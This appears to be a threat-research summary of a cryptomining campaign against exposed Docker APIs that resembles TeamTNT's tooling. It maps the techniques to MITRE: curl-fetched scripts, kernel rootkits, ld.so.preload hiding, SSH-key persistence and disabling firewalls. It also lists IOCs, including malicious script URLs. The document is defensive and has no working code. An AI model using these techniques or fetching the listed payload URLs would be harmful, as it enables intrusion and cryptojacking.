Threat Research

TeamTNT Returns — Or Does It?

Securonix

Trend Micro’s honeypots detected cryptocurrency mining activity targeting cloud and container environments, with actors using Docker API abuse and worm-like propagation that resembles TeamTNT’s arsenal, though WatchDog may be mimicking or behind the campaign. The operation deploys an XMRig miner via Docker-based containers, leverages ZGrab and other scanners, and uses cron, rootkits, and SSH key deployment to persist and spread; attribution remains uncertain between TeamTNT and WatchDog.

Keypoints

  • Malicious cryptocurrency mining samples were observed targeting cloud and container environments.
  • Attack patterns resemble TeamTNT, but WatchDog may be mimicking TeamTNT’s arsenal or behind the campaign.
  • Exposed Docker APIs were probed from IPs around the world, with initial requests to retrieve Docker version information.
  • ZGrab, a banner-grabbing tool, was used in the reconnaissance of Docker API endpoints.
  • Payloads include cron-based persistence (cronb.sh) that downloads and runs the XMRig miner and related components.
  • The attacker uses rootkits, SSH authorized_keys, and various cleanup/hiding techniques to evade detection and maintain access.

MITRE Techniques

  • [T1133] External Remote Services – Docker API version info requests used to identify reachable Docker endpoints. – “…Docker API request to get the docker version info using ‘version’ method…”
  • [T1610] Deploy Container – Docker API create container to launch a new Alpine-based container for the miner. – “…Docker API request to create a container using ‘create’ method…”
  • [T1611] Escape to Host – chroot to mount the filesystem at /mnt, enabling broader access. – “…’chroot’ to mount file system at ‘/mnt’ directory”
  • [T1105] Ingress Tool Transfer – C2/downloads via HTTP (curl) to fetch cronb.sh. – “…curl command is used to download the ‘cronb.sh’…”
  • [T1071.001] Application Layer Protocol: Web Protocols – Web-based transfer/downloads to fetch scripts and payloads. – “Web protocols are used for download of scripts via HTTP(S) requests”
  • [T1204.003] User Execution: Malicious File – Miner delivered/executed to harvest cryptocurrency. – “…To harvest crypto currency ‘xmrig’ coin miner is used”
  • [T1046] Network Service Discovery – Masscan used to discover services within the network. – “…masscan scanning tool is used”
  • [T1053.003] Scheduled Task/Job: Cron – Cron entries created to fetch and execute payloads. – “…the cron entry in crontab and /etc/cron.d to download the file cronb.sh”
  • [T1053.007] Scheduled Task/Job: Container Orchestration Job – Container deployment via Docker orchestration steps. – “…deploy an alpine-based container with instructions to download and execute the malicious shell script”
  • [T1098.004] SSH Authorized Keys – Attackers add SSH public key to authorized_keys to enable remote access. – “The SSH public key we found: ssh-rsa AAAA…”
  • [T1547.006] Boot or Logon Autostart: Kernel Modules and Extensions – Rootkit installed as kernel module via insmod. – “…installs the rootkit as a kernel module with the help of the insmod command”
  • [T1543.002] Create or Modify Systemd Service – Creates cmake.service under /etc/systemd/system. – “as a service in the system under path /etc/systemd/system/cmake.service”
  • [T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking – Updates /etc/ld.so.preload to hide processes. – “updates the /etc/ld.so.preload file”
  • [T1222.002] File and Directory Permissions Modification – Makes cron files immutable via permission changes. – “make the files immutable again by changing the attributes of the cron files”
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Disables SELinux, watchdog, AppArmor, and firewall service. – “Disables various OS’ security and logging features”
  • [T1562.003] Impair Defenses: Impair Command History Logging – Clears bash history to hinder audit trails. – “clears the bash history”
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – Clears iptables rules and disables firewall services. – “Clears the firewall rules from iptables”
  • [T1014] Rootkit – Kernel module rootkit installation for stealth. – “Rootkit installation”
  • [T1018] Remote System Discovery – Lateral movement via SSH to remote servers. – “SSH and deploys the b.sh file in the remote SSH server”
  • [T1132.001] Data Encoding: Standard Encoding – Base64-encoded strings used in the payloads and banners. – “Base64-encoded string”

Indicators of Compromise

  • [IP Address] – Exposed Docker API connections from many IPs; example: 115.238.146.136, 150.158.33.66, and other 10 addresses
  • [Domain] – kiss.a-dog.top and oracle.zzhreceive.top used in fetch and C2-related activity
  • [Domain] – kiss.a-dog.top/t.sh and related domains/files observed in the drop/install chain
  • [File] – xm.tar (XMRIG miner package) and config.json in /usr/share; 1.0.4.tar.gz in the rootkit workflow
  • [URL] – http://kiss.a-dog.top/b2f628/b.sh and related script download URLs
  • [SSH Key] – SSH public key found in authorized_keys for persistence

Read more: https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint